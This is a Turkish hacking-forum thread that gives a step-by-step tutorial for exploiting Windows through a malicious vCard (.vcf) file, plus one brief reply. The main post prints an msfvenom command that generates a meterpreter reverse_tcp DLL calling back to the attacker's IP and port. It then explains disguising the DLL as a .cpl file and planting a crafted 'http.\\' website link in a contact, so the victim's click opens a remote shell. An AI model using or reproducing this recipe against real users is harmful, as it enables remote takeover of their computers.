Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Bilgisayar Güvenliği

Bilgisayar Güvenliği Bilgisayar Güvenlik Sistemleri makaleleri, virüs korumasından, güvenlik duvarlarına kadar her şeyin nasıl çalıştığı hakkında bilgilere buradan ulaşabilirsiniz.




Kötücül vCard (.vcf) Dosyası Kullanarak Windows Exploitleme / R4V3N

Bilgisayar Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 10-03-2019 05:28   #1
  • Yarbay
  • Üye Bilgileri
Üyelik tarihi
07/2016
Nereden
Antalya
Yaş
20
Mesajlar
Konular

Teşekkür (Etti): 679
Teşekkür (Aldı): 1952


Post Kötücül vCard (.vcf) Dosyası Kullanarak Windows Exploitleme / R4V3N



15 Ocak 2019'da bizlere bu zafiyeti getirdiği için siber güvenlik araştırmacısı John Page'e selamlar olsun. Bu bir 0day exploitidir ve tabii ki de güncel Windows 10 ile de çalışır. "Insufficient UI warning remote code execution" denir adına.

John'un bulduğu şey basitçe şudur, bir VCF dosyasına CPL dosyasının yerel yolu ile birlikte websiteye yerleştirirsek tarayıcıda onu açmak yerine direkt indirme eğiliminde olur. Bu da "http://" kısmını "http.<2 tane ters slash>" ile değiştirerek olur ki işin can alıcı kısmı kullanıcının bu tür kasti bir yerel yol yanlışını fark etmesi imkansıza yakındır. Bu yüzden tek yapmamız gereken, VCF dosyasının CPL dosyamızla birlikte (yalnızca yerel yolun dahil edilmesi için HTTP olması gerektiğinden) “HTTP” adındaki bir klasörde kurbana göndermek ve böylelikle bir shell elde edeceğiz.

Ufak Not: "http.<2 tane ters slash>" =

Adımlar:

  • Dll uzantılı bir msfvenom windows payloadı oluşturmak.
  • Dll dosyasını "HTTP" isimli bir klasörde göndermek.
  • "HTTP" klasörünün üst klasöründe bir kişi oluşturmak.
  • Kişiye bir website eklemek.
  • Websitenin önündeki eki "http://" yerine "http.<2 tane ters slash>" olarak değiştirmek.
  • Dll dosyasını <websitenin adı>.cpl olarak yeniden adlandırmak.
  • Multi/handler'ı çalıştırmak
  • Kişiden website yolunu açmak
  • Shell'i spawnlamak.


Kavram Kanıtı:

İlk adım, dll uzantılı bir payload oluşturmaktır. Bunun için msfvenom'un windows payload'ını kullanıyoruz lakin diğer payload'lar da iyicene çalışırlar, bir sıkıntı olmaz.

Bu konu için yerel IP adresimiz 192.168.1.109.

Kod:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f dll > shell.dll




Sonrasında, bu payload'ı kurbana "HTTP" isimli bir klasörde göndereceğiz. Website linkine daha sonra bir yol ekleyeceğimizden ve URL'de HTTP olduğundan klasör adı sadece "HTTP" olmalı, başka bir şey olmamalı. Eğer FTP gibi farklı bir protokol kullandığınızdan URL'nizin önündeki ek farklıysa dizinizin ismini de ftp yapın. Ayrıca geçerli dizinde de olması şart ki bu shell.dll dosyasını kurbanın bilgisayarına kopyalayabilelim.



Sıradaki ve en önemli adım ise bir kişi VCF dosyası oluşturmak. Örnek bir VCF de indirip bir website de ekleyebilirsiniz lakin biz yeni bir tane oluşturacağız.



Herhangi bir isim ekleyin, konu kaynağımın yazarı kendi ismini "Raj Chandel" yazmış.



Home (Ev) sekmesine geçin ve websitesi girmelik bir yer göreceksiniz. Burada yazarın sitesi "hackingarticles.in" eklenmiş lakin asıl önemli olan şey şu:

Genelde websitenin linki https://www.hackingarticles.in lakin bunun başında ufak bir değişikliğe ihtiyacımız var ve "http://" olan kısmını silip "http.<2 tane ters slash>" yazmamız gerekmekte.

Bunun nedeni ise aslında bir website eklemek istemiyoruz, DLL dosyamıza bir yol eklemek istiyoruz ki kurban websiteye tıkladığında DLL'miz çalışabilsin.

Ve website linkinin sonuna ".cpl" eklentisini getiriyoruz. CPL dosyası, Windows işletim sistemi tarafından kullanılan fare, ses veya ağ kontrolleri içeren bir Denetim Masası öğe dosyadır.



Kişiyi kaydedin, ve payload'ımızı ismini düzenleyip shell.dll yerine "www.hackingarticles.in.cpl" olarak değiştirin.



Tamtakırız ve terminalden multi/handler'ı kurmak için DLL dosyasını çalıştırmaya hazırız ve kurbanın bilgisayarında kişiyi açtık.



Linke tıkladığımızda da Kali terminalinde bir oturumun geldiğini göreceğiz.


Konu R4V3N tarafından (10-03-2019 07:30 Saat 07:30 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Alt 11-03-2019 16:03   #2
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
01/2019
Mesajlar
Konular
1

Teşekkür (Etti): 17
Teşekkür (Aldı): 1




gercekten ilginc bir vulnerability, Kali Linuxte test edicem

Konu THE HACKER 21 tarafından (11-03-2019 16:14 Saat 16:14 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau